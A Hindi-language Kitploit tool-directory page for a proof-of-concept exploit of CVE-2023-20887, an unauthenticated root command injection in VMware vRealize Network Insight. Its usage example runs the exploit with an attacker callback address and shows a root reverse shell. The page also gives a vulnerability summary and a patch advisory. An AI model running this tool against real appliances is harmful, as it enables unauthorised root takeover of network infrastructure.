Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-20887 — VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887) | Kitploit
उपकरण/GitHubGitHub/malwareman007/cve-2023-20887
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubmalwareman007/cve-2023-20887

CVE-2023-20887

VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)

रिपॉजिटरी देखें
812 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2023-20887

CVE-2023-20887 के लिए POC - VMWare Aria Operations for Networks (vRealize Network Insight) में बिना प्रमाणीकरण के RCE

तकनीकी विश्लेषण

इस कमजोरी का मूल कारण विश्लेषण मेरे ब्लॉग पर उपलब्ध है: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0

सारांश

VMWare Aria Operations for Networks (vRealize Network Insight) Apache Thrift RPC इंटरफ़ेस के माध्यम से उपयोगकर्ता इनपुट स्वीकार करते समय कमांड इंजेक्शन के प्रति संवेदनशील है। यह कमजोरी एक दूरस्थ अप्रमाणित हमलावर को अंतर्निहित ऑपरेटिंग सिस्टम पर root उपयोगकर्ता के रूप में मनमानी कमांड निष्पादित करने की अनुमति देती है। RPC इंटरफ़ेस एक रिवर्स प्रॉक्सी द्वारा संरक्षित है जिसे बायपास किया जा सकता है। VMware ने इस मुद्दे की गंभीरता को क्रिटिकल श्रेणी में आंका है, जिसका अधिकतम CVSSv3 बेस स्कोर 9.8 है। एक दुर्भावनापूर्ण अभिकर्ता उपकरण पर 'root' के संदर्भ में रिमोट कोड निष्पादन प्राप्त कर सकता है। VMWare 6.x संस्करण संवेदनशील हैं।

उपयोग

root@kitploit:~
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

शमन उपाय

नवीनतम संस्करण में अपडेट करें या Progress Advisory के निर्देशों का पालन करके कमजोरी को कम करें

  • https://www.vmware.com/security/advisories/VMSA-2023-0012.html

अस्वीकरण

यह सॉफ्टवेयर विशुद्ध रूप से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उद्देश्य स्पष्ट रूप से अधिकृत किए गए सिस्टमों को छोड़कर किसी भी सिस्टम पर हमला करने के लिए उपयोग नहीं किया जाना है। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें